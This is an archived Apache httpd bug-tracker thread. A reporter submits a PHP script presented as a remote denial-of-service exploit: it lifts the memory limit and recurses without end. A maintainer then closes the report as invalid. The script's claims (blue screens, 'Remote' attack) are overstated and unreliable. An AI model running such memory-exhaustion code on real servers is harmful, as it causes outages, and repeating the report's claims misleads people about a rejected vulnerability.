You are viewing a plain text version of this content. The canonical link for it is here.

Posted to bugs@httpd.apache.org by bu...@apache.org on 2019/12/14 14:43:31 UTC

[Bug 64002] New: Apache2 HTTP PHP Denial Of Service

https://bz.apache.org/bugzilla/show_bug.cgi?id=64002

            Bug ID: 64002
           Summary: Apache2 HTTP PHP Denial Of Service
           Product: Apache httpd-2
           Version: 2.5-HEAD
          Hardware: All
                OS: All
            Status: NEW
          Severity: normal
          Priority: P2
         Component: All
          Assignee: bugs@httpd.apache.org
          Reporter: alicangonullu@yahoo.com
  Target Milestone: ---

> [Suggested description]
> # Exploit Name : Apache2 HTTP DoS
> # Exploit Date : 13-12-2019
> # Exploit Author : Ali Can Gonullu
> 
> # Exploit :
> 
> <?php
> $sayi = 10;
> ini_set("memory_limit","-1"); //Unlimited Memory
> function islem($n) {
> if ($n === 0) {
> return 1;
> } else {
> $hesap += $n*islem($n-1)-$n*islem($n-2)+$n*islem($n-3);
> echo $hesap;
> }
> }
> islem($sayi);
> ?>
> 
> ------------------------------------------
> 
> [Additional Information]
> This vulnerability inflates RAM to give the computer a blue screen.
> With this vulnerability, servers can be shutdown.
> The ini_set function is turned on in the original Apache PHP version.
> Apache Solution: Blocking ini_set
> 
> ------------------------------------------
> 
> [VulnerabilityType Other]
> Apache2 HTTP PHP Denial Of Service
> 
> ------------------------------------------
> 
> [Vendor of Product]
> Apache
> 
> ------------------------------------------
> 
> [Affected Product Code Base]
> Apache2 HTTP - All
> 
> ------------------------------------------
> 
> [Affected Component]
> Affected source code
> 
> ------------------------------------------
> 
> [Attack Type]
> Remote
> 
> ------------------------------------------
> 
> [Impact Denial of Service]
> true
> 
> ------------------------------------------
> 
> [Attack Vectors]
> Open PHP file (in this code)
> 
> ------------------------------------------
> 
> [Discoverer]
> Ali Can Gonullu

-- 
You are receiving this mail because:
You are the assignee for the bug.
---------------------------------------------------------------------
To unsubscribe, e-mail: bugs-unsubscribe@httpd.apache.org
For additional commands, e-mail: bugs-help@httpd.apache.org

[Bug 64002] Apache2 HTTP PHP Denial Of Service

Posted by bu...@apache.org.

https://bz.apache.org/bugzilla/show_bug.cgi?id=64002

Eric Covener <co...@gmail.com> changed:

           What    |Removed                     |Added
----------------------------------------------------------------------------
         Resolution|---                         |INVALID
             Status|NEW                         |RESOLVED

--- Comment #1 from Eric Covener <co...@gmail.com> ---
php/mod_php aren't maintained here.

-- 
You are receiving this mail because:
You are the assignee for the bug.
---------------------------------------------------------------------
To unsubscribe, e-mail: bugs-unsubscribe@httpd.apache.org
For additional commands, e-mail: bugs-help@httpd.apache.org